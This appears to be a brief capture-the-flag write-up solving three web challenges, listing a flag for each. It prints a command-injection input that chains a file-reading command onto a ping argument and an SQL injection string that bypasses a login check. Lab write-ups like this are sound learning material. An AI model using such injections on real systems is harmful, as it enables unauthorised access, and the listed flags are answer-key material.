WEB

Trapped Source

View page source -> correctPin: “8291”

HTB{V13w_50urc3_c4n_b3_u53ful!!!}

Gunhead

Simple command injection - enter /ping 1 & cat /flag.txt and get the flag Gunhead - command injection

HTB{4lw4y5_54n1t1z3_u53r_1nput!!!}

Drobots

Since my Web knowledge is very limited read about SQL Injection and then entered these credentials on the login screen: admin " or ""="

Drobots - SQL injection

HTB{p4r4m3t3r1z4t10n_1s_1mp0rt4nt!!!}